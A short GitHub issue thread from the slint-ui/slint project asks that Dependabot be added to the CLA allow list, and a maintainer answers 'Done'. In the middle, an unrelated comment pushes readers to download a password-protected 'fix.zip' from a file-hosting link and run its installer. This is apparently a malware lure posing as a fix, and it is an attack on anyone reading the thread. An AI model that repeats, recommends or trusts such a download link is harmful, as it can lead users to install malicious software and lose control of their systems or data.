### ISSUE TITLE
Need to add Dependabot to the CLA whitelist

### ISSUE THREAD

**Issue by NigelBreslaw** [slint-ui/slint#5944]
https://github.com/cla-assistant/cla-assistant#can-i-allow-bot-user-contributions

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ogoffart** [comment]
Done
